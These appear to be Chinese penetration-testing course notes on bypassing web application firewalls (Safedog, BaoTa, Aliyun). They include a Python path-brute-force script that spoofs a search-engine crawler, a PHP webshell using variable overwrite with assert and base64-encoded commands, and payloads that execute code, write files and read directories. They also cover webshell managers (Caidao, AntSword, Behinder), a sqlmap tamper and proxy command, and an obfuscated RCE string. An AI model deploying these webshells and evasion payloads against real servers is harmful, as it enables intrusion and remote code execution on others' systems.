文章目录
视频资源
46. 信息收集之反爬虫延迟代理技术(46-49)
#搜索引擎爬虫模拟及模拟真实用户
import requests
import time
headers={
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
#模拟用户 Kit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
#模拟引擎 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
#更多爬虫引擎:https://www.cnblogs.com/iack/p/3557371.html
'User-Agent': 'Mozilla/5.0 (compatible; Baiduspider-render/2.0;+http://www.baidu.com/search/spider.html)',
'Sec-Fetch-Dest': 'document',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'Cookie': 'PHPSESSID=99d6a382f03de62bb8f51ba51e51550f',#根据当前访问 cookie
}
for paths in open('php_b.txt',encoding='utf-8'):
url='http://192.168.0.109:8890/'
paths=paths.replace('\n','')
urls=url+paths
#如需测试加代理,或加入代理池需加代理
proxy = {
'http': '127.0.0.1:7777'
}
try:
code=requests.get(urls,headers=headers,verify=False).status_code
print(urls+'|'+str(code))
if code==200 or code==403:
print(urls+'|'+str(code))
except Exception as err:
print('connecting error')
#time.sleep(3)模拟用户需延时 引擎可用可不用(根据请求速度
涉及资源
https://www.bt.cn/
http://free.safedog.cn/website_safedog.html
https://www.cnblogs.com/iack/p/3557371.html
47. W漏洞发现之代理池指纹被动探针
47.1 漏洞发现触发 WAF 点-针对 xray,awvs 等
1.扫描速度-(代理池,延迟,白名单等)
2.工具指纹-(特征修改,伪造模拟真实用户等)
3.漏洞 Payload-(数据变异,数据加密,白名单等)
47.2 案例演示
代理池 Proxy_pool 项目搭建及使用解释
充钱代理池直接干 safedog+BT+Aliyun 探针
Safedog-awvs 漏扫注入测试绕过-延时,白名单
Aliyun_os-awvs 漏扫注入测试绕过-延时白名单
BT(baota)-awvs+xray 漏扫 Payload 绕过-延时被动
充钱代理池直接干 Safedog+BT+AliyunOS 漏洞发现
涉及资源
http://httpbin.org/
https://www.kuaidaili.com/
https://github.com/jhao104/proxy_pool
48. 权限控制之代码混淆及行为造轮子
48.1 Safedog&宝塔代码层手写及脚本绕过
变量覆盖,加密混淆,异或生成
- 127.0.0.1:8081/1.php?x=b;y=assert post:z=phpinfo 这种传输形式宝塔会拦截
- 在脚本里把接收的参数加密可绕过,把phpinfo()采用base64加密形式传输
<?php
$a=$_GET['x'];
$$a=$_GET['y'];
#$b($_POST['z']); 宝塔会拦截
$b(base64_decode($_POST['z']));
?>
http://192.168.206.132:8082/`1.php?x=b&y=assert`
#z=phpinfo();
z=cGhwaW5mbygpOw==
- 异或生成
48.2 BT Aliyun 代码层手写及脚本绕过
编码解码(变量覆盖,加密混淆,异或生成)ASP,PHP,ASPX,JSP,PY 等后门免杀同理
http://test.xiaodi8.com/x.php?id=x
mr6=cGhwaW5mbygpOw==
http://test.xiaodi8.com/xx.php?x=b&y=assert
z=cGhwaW5mbygpOw== 执行代码
z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw== 写入文件
z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs= 读取文件
48.3 菜刀,蚁剑,冰蝎优缺点
菜刀:未更新状态,无插件,单向加密传输
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,双向加密传输
演示案例:
Safedog-手写覆盖变异简易代码绕过-代码层
Safedog-基于接口类加密混淆代码绕过-代码层
BT,Aliyun-基于覆盖加密变异下编码解码绕过-代码层
Safedog-基于工具功能数据包指纹修改变异绕过-行为层
Safedog,BT,Aliyun-基于冰蝎新型控制器绕过全面测试-行为层
Safedog,BT,Aliyun-基于手写新型控制器绕过全面测试-行为层
涉及资源
https://github.com/djunny/enphp
https://www.phpjiami.com/phpjiami.html
https://github.com/rebeyond/Behinder/releases/
https://github.com/AntSwordProject/antSword/releases
49. 漏洞利用注入上传跨站等绕过
49.1 SQL 注入
如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块
安全狗:参考之前 payload
Aliyun:基本修改指纹即可
宝塔:匹配关键字外加/*等
sqlmap --proxy=“http://127.0.0.1:8080” --tamper=“waf.py” --random-agent
49.2 文件上传
1.php 截断 参考前面上传 waf 绕过 payload
49.3 XSS 跨站
利用 XSStrike 绕过 加上–timeout 或–proxy 绕过 cc
49.4 其他集合
RCE
加密加码绕过?算法可逆?关键字绕过?提交方法?各种测试!
txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4
文件包含:没什么好说的就这几种
…\ …/ …\